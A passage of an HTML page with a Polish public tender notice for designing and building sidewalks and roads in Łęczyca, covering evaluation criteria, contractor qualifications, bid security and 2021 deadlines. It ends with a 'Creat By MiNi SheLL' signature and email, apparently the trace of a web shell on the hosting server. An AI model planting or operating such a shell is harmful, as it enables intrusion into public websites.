SWZ oraz otrzyma największą liczbę punktów. <br/>Zamawiający przyjmuje, że: 1 pkt = 1 % <br/> <br/>P = C + G <br/> <br/>gdzie: <br/>P – łączna ilość punktów badanej oferty <br/>C – ilość punktów badanej oferty w kryterium cena <br/>G – ilość punktów badanej oferty w kryterium gwarancja i rękojmia</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja i rękojmia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> W przypadku składania oferty na Część 1 zamówienia:<br/>3.4.1.1. w okresie ostatnich 3 (trzech) lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie wykonali należycie co najmniej jedną<br/>dokumentację projektową, która obejmowała budowę lub przebudowę chodnika/chodników lub<br/>drogi publicznej/dróg publicznych,<br/>3.4.1.2. w okresie ostatnich 5 (pięciu) lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie wykonali roboty budowlane obejmujące<br/>swoim zakresem budowę lub przebudowę chodników lub dróg publicznych o łącznej wartości nie<br/>mniejszej niż 70 000,00 zł brutto.<br/>3.4.2. dysponują osobami zdolnymi do wykonania zamówienia tj.:<br/>3.4.2.1. jedną osobą na stanowisko projektanta branży drogowej posiadającą uprawnienia<br/>budowlane do projektowania w specjalności inżynieryjnej drogowej,<br/>3.4.2.2. jedną osobą na stanowisko projektanta branży elektrycznej posiadającą uprawnienia<br/>budowlane do projektowania w specjalności instalacyjnej w zakresie sieci elektrycznych ielektroenergetycznych,<br/>3.4.2.3. jedną osobą na stanowisko kierownika budowy posiadającą uprawnienia budowlane do<br/>kierowania robotami w specjalności inżynieryjnej drogowej,<br/>3.4.2.4. jedną osobą na stanowisko kierownika robót elektroenergetycznych posiadającą<br/>uprawnienia budowlane do kierowania robotami w specjalności instalacyjnej w zakresie sieci<br/>elektrycznych i elektroenergetycznych.<br/>W przypadku składania oferty na Część 2 zamówienia:<br/>3.4.1.1. w okresie ostatnich 3 (trzech) lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie wykonali należycie co najmniej jedną<br/>dokumentację projektową, która obejmowała budowę lub przebudowę chodnika/chodników lub<br/>drogi publicznej/dróg publicznych,<br/>3.4.1.2. w okresie ostatnich 5 (pięciu) lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie wykonali roboty budowlane obejmujące<br/>swoim zakresem budowę lub przebudowę chodników lub dróg publicznych o łącznej wartości nie<br/>mniejszej niż 70 000,00 zł brutto.<br/>3.4.2. dysponują osobami zdolnymi do wykonania zamówienia tj.:<br/>3.4.2.1. jedną osobą na stanowisko projektanta branży drogowej posiadającą uprawnienia<br/>budowlane do projektowania w specjalności inżynieryjnej drogowej,<br/>3.4.2.2. jedną osobą na stanowisko projektanta branży elektrycznej posiadającą uprawnienia<br/>budowlane do projektowania w specjalności instalacyjnej w zakresie sieci elektrycznych i<br/>elektroenergetycznych,<br/>3.4.2.3. jedną osobą na stanowisko kierownika budowy posiadającą uprawnienia budowlane do<br/>kierowania robotami w specjalności inżynieryjnej drogowej,<br/>3.4.2.4. jedną osobą na stanowisko kierownika robót elektroenergetycznych posiadającą<br/>uprawnienia budowlane do kierowania robotami w specjalności instalacyjnej w zakresie sieci<br/>elektrycznych i elektroenergetycznych.<br/>W przypadku składania oferty na dwie części:<br/>3.4.1.1. w okresie ostatnich 3 (trzech) lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie wykonali należycie co najmniej dwie<br/>dokumentacje projektowe, z których każda obejmowała budowę lub przebudowę<br/>chodnika/chodników lub drogi publicznej/dróg publicznych,<br/>3.4.1.2. w okresie ostatnich 5 (pięciu) lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie wykonali roboty budowlane obejmujące<br/>swoim zakresem budowę lub przebudowę chodników lub dróg publicznych o łącznej wartości nie<br/>mniejszej niż 140 000,00 zł brutto.<br/>3.4.2. dysponują osobami zdolnymi do wykonania zamówienia tj.:<br/>3.4.2.1. jedną osobą na stanowisko projektanta branży drogowej posiadającą uprawnienia<br/>budowlane do projektowania w specjalności inżynieryjnej drogowej,<br/>3.4.2.2. jedną osobą na stanowisko projektanta branży elektrycznej posiadającą uprawnienia<br/>budowlane do projektowania w specjalności instalacyjnej w zakresie sieci elektrycznych i<br/>elektroenergetycznych,<br/>3.4.2.3. jedną osobą na stanowisko kierownika budowy posiadającą uprawnienia budowlane do<br/>kierowania robotami w specjalności inżynieryjnej drogowej,<br/>3.4.2.4. jedną osobą na stanowisko kierownika robót elektroenergetycznych posiadającą<br/>uprawnienia budowlane do kierowania robotami w specjalności instalacyjnej w zakresie sieci<br/>elektrycznych i elektroenergetycznych.<br/>Wartości podane w dokumentach potwierdzających spełnienie warunku w walutach innych niż<br/>PLN, zamawiający przeliczy po średnim kursie ogłoszonym przez Narodowy Bank Polski (tabela<br/>A) w dniu opublikowania ogłoszenia o niniejszym zamówieniu w Biuletynie Zamówień<br/>Publicznych, a jeżeli w tym dniu kursu nie ogłoszono, to według tabeli kursów średnich NBP<br/>ostatnio przed tą datą ogłoszonych. Wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia warunek udziału w postępowaniu dotyczący sytuacji ekonomicznej lub finansowej<br/>spełniają łącznie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie o aktualności informacji zawartych w oświadczeniu o niepodleganiu wykluczeniu (wzór)<br/>– wg zał. nr 10 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie<br/>ostatnich 5 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest<br/>krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz<br/>podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających,<br/>czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są<br/>referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane<br/>zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych<br/>dokumentów – inne odpowiednie dokumenty – wg zał. nr 11 do SWZ (wzór);Uwaga!Jeżeli Wykonawca<br/>powołuje się na doświadczenie w realizacji robót budowlanych, wykonywanych wspólnie z innymi<br/>wykonawcami, wówczas w powyższym wykazie robót budowlanych zobowiązany jest podać jedynie te<br/>roboty budowlane w których wykonaniu wykonawca ten bezpośrednio uczestniczył. 2) Wykaz<br/>usługwykonanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich przedmiotu, dat wykonania<br/>i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających, czy<br/>te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne<br/>dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli wykonawca<br/>z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie<br/>wykonawcy – wg zał. nr 12 do SWZ (wzór);3) Wykaz osób, skierowanych przez wykonawcę do<br/>realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług lub<br/>kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych,<br/>uprawnień, niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez<br/>nie czynności oraz informacją o podstawie do dysponowania tymi osobami – wg zał. nr 13 do SWZ<br/>(wzór).</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykaz oświadczeń i dokumentów jakie Wykonawca musi dołączyć do oferty (dotyczy zarówno oferty na Część 1 i Część 2): <br/>a)	wypełniony formularz oferty – wg zał. nr 1 do SWZ (wzór), <br/>b)	wypełniony formularz cenowy – wg zał. nr 2 do SWZ (wzór), <br/>c)	oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu – wg zał. nr 5 do SWZ (wzór), <br/>d)	oświadczenie Wykonawcy o niepodleganiu wykluczeniu – wg zał. nr 6 do SWZ (wzór), <br/>e)	oświadczenie o zakresie wykonania zamówienia przez poszczególnych wykonawców wspólnie ubiegających się o zamówienie – wg zał. nr 7 do SWZ (wzór) - jeśli dotyczy, <br/>f)	zobowiązanie podmiotu udostępniającego zasoby własne – wg zał. nr 8 do SWZ (wzór) - <br/>jeśli dotyczy, <br/>g)	oświadczenie podmiotu udostępniającego zasoby własne o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu – wg zał. nr 9 do SWZ - jeśli dotyczy, h) pełnomocnictwo do reprezentowania wykonawcy w niniejszym zamówieniu, jeżeli wymieniona osoba/osoby nie zostały wskazane do reprezentacji we właściwym rejestrze lub ewidencji działalności gospodarczej - jeśli dotyczy, <br/>i)	pełnomocnictwo dla lidera (dotyczy podmiotów wspólnie ubiegających się o zamówienie tzw. „konsorcja” oraz spółek cywilnych) - jeśli dotyczy, <br/>j)	oryginał gwarancji lub poręczenia – jeżeli wadium wnoszone jest w innej formie niż w pieniądzu. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wymagania dotyczące wadium:<br/>a) Zamawiający żąda wniesienia wadium w kwocie:<br/>1) W przypadku składania oferty na Część 1 zamówienia: 1.000,00 zł (słownie złotych: jeden<br/>tysiąc 00/100)<br/>2) W przypadku składania oferty na Część 2 zamówienia: 1.000,00 zł (słownie złotych: jeden<br/>tysiąc 00/100)<br/>3) W przypadku składania oferty na Część 1 i Część 2 zamówienia: 2 000,00 zł (słownie złotych:<br/>dwa tysiące 00/100)<br/>Wadium należy wnieść przed upływem terminu składania ofert.<br/>b) Wadium może być wnoszone w pieniądzu, gwarancjach bankowych, gwarancjach<br/>ubezpieczeniowych i poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5<br/>pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju<br/>Przedsiębiorczości.<br/>c) Wadium wnoszone w pieniądzu należy przelać na rachunek bankowy prowadzącego<br/>postepowanie, nr konta: 68 9029 0000 2001 0104 4933 0011.<br/>d) Za termin wniesienia wadium w formie pieniężnej przyjmuje się termin uznania rachunku<br/>bankowego zamawiającego.e) Wadium wnoszone w formie innej niż pieniężna musi być wniesione w oryginale w postaci<br/>elektronicznej i musi obejmować cały okres związania ofertą. Gwarancja lub poręczenie musi<br/>zawierać w swojej treści nieodwołalne i bezwarunkowe zobowiązane wystawcy dokumentu do<br/>zapłaty na rzecz Zamawiającego kwoty wadium płatne na pierwsze pisemne żądanie<br/>Zamawiającego. Wadium należy załączyć do zaszyfrowanej zgodnie z zapisami rozdziału VIII<br/>pkt. 1 SWZ oferty wykonawcy.<br/>f) Dokument, o którym mowa w lit. e) musi być podpisany podpisem elektronicznym przez<br/>gwaranta/ poręczyciela<br/>g) Zwrot wadium nastąpi zgodnie z art. 98 Pzp.<br/>h) Zamawiający zatrzymuje wadium zgodnie z zasadami określonymi w art. 98 ust. 6 Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, ustanawiają pełnomocnika do<br/>reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 2. W toku prowadzonego<br/>postępowania komunikacja pomiędzy zamawiającym a wykonawcami wspólnie ubiegającymi<br/>się o udzielenie zamówienia następować będzie za pośrednictwem lidera (pełnomocnika), o<br/>którym mowa w pkt. 1 w rozdziale V SWZ. 3. Wymagania dotyczące składania oferty przez<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia zawarte są w rozdziale V<br/>SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z wzorem Umowy stanowiącym załącznik nr 4 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-07 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz ze wszystkimi wymaganymi oświadczeniami i dokumentami, należy złożyć za pośrednictwem Platformy na stronie internetowej profilu nabywcy https://platformazakupowa.pl/pn/um_leczyca</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-07 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-01-05</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com